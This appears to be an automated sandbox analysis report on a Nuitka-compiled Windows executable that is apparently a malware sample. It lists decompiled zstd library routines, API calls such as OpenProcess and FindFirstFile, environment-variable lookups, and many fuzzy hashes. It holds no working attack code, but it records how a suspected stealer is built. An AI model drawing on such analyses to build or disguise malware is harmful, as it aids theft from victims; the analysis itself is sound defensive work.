                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h, xrefs: 0040401E
                                                                                                                                                                • nbBits < BIT_MASK_SIZE, xrefs: 00404025
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _assert
                                                                                                                                                                • String ID: C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h$nbBits < BIT_MASK_SIZE
                                                                                                                                                                • API String ID: 1222420520-2490357055
                                                                                                                                                                • Opcode ID: 7f63b024364d176c3ed7232232ee18682f87216aaf646ae975a57b668dd4caef
                                                                                                                                                                • Instruction ID: 15df9c9b6f0689f3bc681e5c2e15e7c41bef0dd5e31cb6e2df14c3463ae756cd
                                                                                                                                                                • Opcode Fuzzy Hash: 7f63b024364d176c3ed7232232ee18682f87216aaf646ae975a57b668dd4caef
                                                                                                                                                                • Instruction Fuzzy Hash: 5921B3F3B11A8986D708CF25E84475D77A5F348BC8F58812AEF496B394DB78C9A4C344
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h, xrefs: 00401836
                                                                                                                                                                • nbBits < BIT_MASK_SIZE, xrefs: 0040183D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _assert
                                                                                                                                                                • String ID: C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h$nbBits < BIT_MASK_SIZE
                                                                                                                                                                • API String ID: 1222420520-2490357055
                                                                                                                                                                • Opcode ID: fcddad1668c469c0cf82814d307a856b0abfafb698f75271dc40d66abe7eb004
                                                                                                                                                                • Instruction ID: 04b1a0a5ac88d5d4788d1db48f5f0ceafe11a15e36386693d9c0afb0c6541c39
                                                                                                                                                                • Opcode Fuzzy Hash: fcddad1668c469c0cf82814d307a856b0abfafb698f75271dc40d66abe7eb004
                                                                                                                                                                • Instruction Fuzzy Hash: A901F567701594A6E7118F2AEC4075EBB60F308F9CF4D8012EF4957390DA34C995D344
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h, xrefs: 00401896
                                                                                                                                                                • nbBits >= 1, xrefs: 0040189D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _assert
                                                                                                                                                                • String ID: C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h$nbBits >= 1
                                                                                                                                                                • API String ID: 1222420520-1700488978
                                                                                                                                                                • Opcode ID: 6ec9baf6aa0af4de1258b8e31fde25364cc199c8d2396736d310e6694e74d174
                                                                                                                                                                • Instruction ID: 50306d61f4c3f28cd9f706f24cdb7d8ec1b790f10d4dfbaf4cb51d9dfcc1ea09
                                                                                                                                                                • Opcode Fuzzy Hash: 6ec9baf6aa0af4de1258b8e31fde25364cc199c8d2396736d310e6694e74d174
                                                                                                                                                                • Instruction Fuzzy Hash: 3CE0867270551993DF18AB17F8917592322A394350F88C4359F4E137A0CE38C959C744
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 25%
                                                                                                                                                                			E00402B6E(void* __ebx, signed int __rdi, signed long long __r13, void* __r15) {
                                                                                                                                                                				signed int _t31;
                                                                                                                                                                				signed short _t33;
                                                                                                                                                                				signed int _t34;
                                                                                                                                                                				short _t37;
                                                                                                                                                                				void* _t49;
                                                                                                                                                                				signed short* _t55;
                                                                                                                                                                				short* _t68;
                                                                                                                                                                				signed long long _t69;
                                                                                                                                                                				void* _t73;
                                                                                                                                                                				short* _t75;
                                                                                                                                                                				signed long long _t77;
                                                                                                                                                                				void* _t81;
                                                                                                                                                                
                                                                                                                                                                				_t81 = __r15;
                                                                                                                                                                				_t77 = __r13;
                                                                                                                                                                				r8d = 0x1c7;
                                                                                                                                                                				dil = dil + dil;
                                                                                                                                                                				asm("adc eax, 0x3d908");
                                                                                                                                                                				_t75 = _t68;
                                                                                                                                                                				 *((long long*)(_t73 + 0x20)) = __imp___assert;
                                                                                                                                                                				_t49 =  *((intOrPtr*)(_t73 + 0x90)) + 0x10 + __rdi * 8;
                                                                                                                                                                				goto L2;
                                                                                                                                                                				do {
                                                                                                                                                                					do {
                                                                                                                                                                						L2:
                                                                                                                                                                						r13d =  *((intOrPtr*)(_t75 + 4));
                                                                                                                                                                						_t55 = _t81 + _t77 * 2;
                                                                                                                                                                						_t69 =  *_t55 & 0x0000ffff;
                                                                                                                                                                						 *_t55 = _t33;
                                                                                                                                                                						if(_t69 == 0) {
                                                                                                                                                                							r8d = 0x8e;
                                                                                                                                                                							__imp___assert();
                                                                                                                                                                						}
                                                                                                                                                                						asm("bsr ecx, ebp");
                                                                                                                                                                						asm("invalid");
                                                                                                                                                                						asm("loop 0x6b");
                                                                                                                                                                						_t34 = _t31 * _t69 >> 0x20;
                                                                                                                                                                						_t31 = _t31 * _t69;
                                                                                                                                                                						 *(_t75 + 3) = _t34;
                                                                                                                                                                						 *_t75 = _t37;
                                                                                                                                                                						if( *((intOrPtr*)( *((intOrPtr*)(_t73 + 0xb0)) + _t77 * 4)) > 0xfe) {
                                                                                                                                                                							goto L6;
                                                                                                                                                                						} else {
                                                                                                                                                                							goto L4;
                                                                                                                                                                						}
                                                                                                                                                                						goto L5;
                                                                                                                                                                						L6:
                                                                                                                                                                						_t75 = _t75 + 8;
                                                                                                                                                                						r8d = 0x1e0;
                                                                                                                                                                						_t31 =  *((long long*)( *((intOrPtr*)(_t73 + 0x20))))();
                                                                                                                                                                						 *(_t75 - 6) = _t34;
                                                                                                                                                                						 *((intOrPtr*)(_t75 - 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t73 + 0xa8)) + _t77 * 4));
                                                                                                                                                                					} while (_t75 != _t49);
                                                                                                                                                                					break;
                                                                                                                                                                					L4:
                                                                                                                                                                					 *(_t75 + 2) = _t34;
                                                                                                                                                                					_t75 = _t75 + 8;
                                                                                                                                                                					 *((intOrPtr*)(_t75 - 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t73 + 0xa8)) + _t77 * 4));
                                                                                                                                                                				} while (_t49 != _t75);
                                                                                                                                                                				L5:
                                                                                                                                                                				return _t31;
                                                                                                                                                                			}















                                                                                                                                                                0x00402b6e
                                                                                                                                                                0x00402b6e
                                                                                                                                                                0x00402b6e
                                                                                                                                                                0x00402b81
                                                                                                                                                                0x00402b83
                                                                                                                                                                0x004028ba
                                                                                                                                                                0x004028d5
                                                                                                                                                                0x004028dc
                                                                                                                                                                0x004028df
                                                                                                                                                                0x004028e8
                                                                                                                                                                0x004028e8
                                                                                                                                                                0x004028e8
                                                                                                                                                                0x004028e8
                                                                                                                                                                0x004028ed
                                                                                                                                                                0x004028f1
                                                                                                                                                                0x004028f7
                                                                                                                                                                0x004028fc
                                                                                                                                                                0x004029d9
                                                                                                                                                                0x004029e9
                                                                                                                                                                0x004029e9
                                                                                                                                                                0x00402902
                                                                                                                                                                0x00402911
                                                                                                                                                                0x00402912
                                                                                                                                                                0x00402914
                                                                                                                                                                0x00402914
                                                                                                                                                                0x00402918
                                                                                                                                                                0x0040291d
                                                                                                                                                                0x0040292f
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00402993
                                                                                                                                                                0x0040299f
                                                                                                                                                                0x004029a3
                                                                                                                                                                0x004029b0
                                                                                                                                                                0x004029bd
                                                                                                                                                                0x004029c6
                                                                                                                                                                0x004029cb
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00402931
                                                                                                                                                                0x00402939
                                                                                                                                                                0x0040293e
                                                                                                                                                                0x00402946
                                                                                                                                                                0x0040294b
                                                                                                                                                                0x00402950
                                                                                                                                                                0x00402960

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • position == 0, xrefs: 00402B7B
                                                                                                                                                                • C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/decompress/zstd_decompress_block.c, xrefs: 00402B74
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _assert
                                                                                                                                                                • String ID: C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/decompress/zstd_decompress_block.c$position == 0
                                                                                                                                                                • API String ID: 1222420520-364413042
                                                                                                                                                                • Opcode ID: 577e3e5f29719710d16149a4ba94b5016d57a63fcf6c80e3acaccf5e858ac52b
                                                                                                                                                                • Instruction ID: 035be0b90b44c1e5ca049ae90ea0c9a46175ee5ee0a0a1431348f0537739eea1
                                                                                                                                                                • Opcode Fuzzy Hash: 577e3e5f29719710d16149a4ba94b5016d57a63fcf6c80e3acaccf5e858ac52b
                                                                                                                                                                • Instruction Fuzzy Hash: DFC092E430A912E1FA00DB11E954B982320A750B44FD1802AA70E414F4AFBDC60DC70C
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:0.2%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                Total number of Nodes:6
                                                                                                                                                                Total number of Limit Nodes:2
                                                                                                                                                                execution_graph 40458 557b50 40459 557b88 SleepEx OpenProcess 40458->40459 40460 557ba7 WaitForSingleObject FindCloseChangeNotification 40459->40460 40461 557bd8 GetLastError 40459->40461 40460->40459 40462 557bba PyErr_SetInterrupt 40460->40462 40461->40462 40463 557be0 40461->40463 40463->40459

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.230004889.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.229996529.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.230055852.00000000005C2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.230063601.00000000005D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.230071551.00000000005DF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.230078177.00000000005EC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.230078177.00000000005F8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.230091214.00000000005FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_test.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ChangeCloseErr_ErrorFindInterruptLastNotificationObjectOpenProcessSingleSleepWait
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 842494446-0
                                                                                                                                                                • Opcode ID: fe6d0efd7a0be18a5374f77652df3073de4164e97283ae3b725b09f4b5d67a66
                                                                                                                                                                • Instruction ID: 0c99bc4e85985314e867aa14fc9a7f2eb5f8cf3cf666d9d3530af785429f4ade
                                                                                                                                                                • Opcode Fuzzy Hash: fe6d0efd7a0be18a5374f77652df3073de4164e97283ae3b725b09f4b5d67a66
                                                                                                                                                                • Instruction Fuzzy Hash: EA01AF25B11E46D5EA159BA7BC10B371A95BB8DBE7F494032DE1C43350EE3CC886C710
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharMultiWide_errno$FileFind$ErrorFirstLastNextfreemallocmemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3372420414-0
                                                                                                                                                                • Opcode ID: 5c753f6ee10f5d401d3a973a1d8301d71a9dd3c075b512ff88a6f757cec8f98e
                                                                                                                                                                • Instruction ID: dc931f34dada93bae943df16885b375699c41fa0d4b9d81008c95cc65b2e24da
                                                                                                                                                                • Opcode Fuzzy Hash: 5c753f6ee10f5d401d3a973a1d8301d71a9dd3c075b512ff88a6f757cec8f98e
                                                                                                                                                                • Instruction Fuzzy Hash: FBB11562B08A8685EB188F25E8686797BA0FF59BA4F484731DB6D037D0EF3DE0459340
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnvironmentVariable$ByteCharMultiWide
                                                                                                                                                                • String ID: .rnd$HOME$RANDFILE$SYSTEMROOT$USERPROFILE
                                                                                                                                                                • API String ID: 2184640988-1666712896
                                                                                                                                                                • Opcode ID: 94a3f27f441c069f02bf03fdac3435e2be26af5a1126ddad85516de43e4ab70a
                                                                                                                                                                • Instruction ID: f3b2b23f387a46e4829f6c578e815338dd02b7ff32691be0f381d938ecf791b3
                                                                                                                                                                • Opcode Fuzzy Hash: 94a3f27f441c069f02bf03fdac3435e2be26af5a1126ddad85516de43e4ab70a
                                                                                                                                                                • Instruction Fuzzy Hash: F761E322B08B8695EB58CF21A46017967A1FB59BE4B488331DF6D437D8DF3EE105E300
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 313767242-0
                                                                                                                                                                • Opcode ID: ce35e6337236f3c81091592d9187cbdc35141420fbd4c5511d86306e2d3c8c38
                                                                                                                                                                • Instruction ID: 65425b828e2fc1675746f37939820d40e660f106bd68d24aa44ab5b4e75d7187
                                                                                                                                                                • Opcode Fuzzy Hash: ce35e6337236f3c81091592d9187cbdc35141420fbd4c5511d86306e2d3c8c38
                                                                                                                                                                • Instruction Fuzzy Hash: B0315CB6709B859AEB649F60E8503ED3360FB84788F44413ADB8E57B98EF38D548D710
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memmove$memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3790616698-0
                                                                                                                                                                • Opcode ID: 7bd3081549f37e99082b2e2184b592387e8504f8a293854baa3812126ce6fff8
                                                                                                                                                                • Instruction ID: ef228217251fa738fd2fdc68da1d979ef389dc1a69dbe499d5f87608ff27f064
                                                                                                                                                                • Opcode Fuzzy Hash: 7bd3081549f37e99082b2e2184b592387e8504f8a293854baa3812126ce6fff8
